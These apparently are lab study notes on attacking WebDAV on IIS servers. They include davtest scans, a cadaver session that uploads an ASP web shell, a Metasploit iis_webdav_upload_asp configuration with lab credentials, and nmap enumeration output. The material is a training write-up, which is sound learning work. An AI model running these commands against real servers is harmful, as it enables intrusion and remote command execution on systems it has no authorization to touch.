WebDAV and IIS Exploitation
WebDAV and IIS Exploitation
Sections in This Note
WebDAV
WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.
The first step of the exploitation process is identifying whether WebDAV has been configured to run on the IIS web server. Then perform a brute-force attack on the WebDAV server to identify credentials.
After obtaining credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.
Related
Migrated from Unsorted Notes — Frequently Exploited Windows Services
Frequently Exploited Windows Services
| Protocol/Service | Ports | Purpose |
|---|---|---|
| Microsoft IIS (Internet Information Services) | TCP 80/443 | Proprietary web server developed by Microsoft that runs on Windows |
| WebDAV (Web Distributed Authoring & Versioning) | TCP 80/443 | HTTP extension allowing clients to update, delete, move, and copy files on a web server; used to enable a web server to act as a file server |
| SMB/CIFS (Server Message Block) | TCP 445 | Network file sharing protocol used to facilitate sharing of files and peripherals between computers on a LAN |
| RDP (Remote Desktop Protocol) | TCP 3389 | Proprietary GUI remote access protocol developed by Microsoft, used to remotely authenticate and interact with a Windows system |
| WinRM (Windows Remote Management Protocol) | TCP 5985/5986 | Windows remote management protocol used to facilitate remote access |
Migrated from Unsorted Notes — Tools Used
Tools Used
- davtest — used to scan, authenticate, and exploit a WebDAV server
- cadaver — supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collecting creation/deletion, property manipulation, and resource locking on WebDAV servers
Migrated from Unsorted Notes — Using davtest for Scanning
Using davtest for Scanning
Command: davtest -auth bob:password_123321 -url http://10.0.16.177/webdav
root@attackdefense:~# davtest -auth bob:password_123321 -url http://10.0.16.177/webdav
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.0.16.177/webdav
********************************************************
NOTE Random string for this session: 1CwBZI4vZ
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ
********************************************************
Sending test files
PUT asp SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.asp
PUT jhtml SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.jhtml
PUT pl SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.pl
PUT txt SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.txt
PUT cgi SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.cgi
PUT cfm SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.cfm
PUT shtml SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.shtml
PUT jsp SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.jsp
PUT aspx SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.aspx
PUT php SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.php
PUT html SUCCEED: http://10.0.16.177/webdav/DavTestDir_1CwBZI4vZ/davtest_1CwBZI4vZ.html
Migrated from Unsorted Notes — Using cadaver to Upload the .asp Exploit File
Using cadaver to Upload the .asp Exploit File
root@attackdefense:~# cadaver http://10.0.16.177/webdav
Authentication required for 10.0.16.177 on server `10.0.16.177':
Username: bob
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
Coll: DavTestDir_1CwBZI4vZ 0 Jan 7 17:37
AttackDefense.txt 13 Jan 2 18:23
web.config 168 Jan 2 18:23
dav:/webdav/>
Uploading webshell.asp (stored by default at /usr/share/webshells/asp/webshell.asp):
Command: put /usr/share/webshells/asp/webshell.asp
ls
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
Uploading /usr/share/webshells/asp/webshell.asp to `/webdav/webshell.asp':
Progress: [=============================>] 100.0% of 1362 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
Coll: DavTestDir_1CwBZI4vZ 0 Jan 7 17:37
AttackDefense.txt 13 Jan 2 18:23
web.config 168 Jan 2 18:23
webshell.asp 1362 Jan 7 17:55
dav:/webdav/>
Migrated from Unsorted Notes — Uploading Exploit File Using Metasploit
Uploading Exploit File Using Metasploit
Command: davtest -auth bob:password_123321 -url http://10.0.17.27/webdav
Running Metasploit and exploiting the target using the IIS WebDAV exploit module:
Commands:
msfconsole -q
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.0.17.27
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp
exploit
Migrated from Unsorted Notes — Port Scanning and Enumeration
Port Scanning and Enumeration
Identify the target IP address:
cat /etc/hosts
Port scanning with Nmap:
nmap -sV 10.0.22.85
Host is up (0.0035s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
3389/tcp open tcpwrapped
4848/tcp open ssl/http Oracle Glassfish Application Server
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp open wap-wsp?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Nmap script scan on 10000 ports for additional info:
nmap -T4 -Pn -sC -sV -p 1-10000 10.0.22.85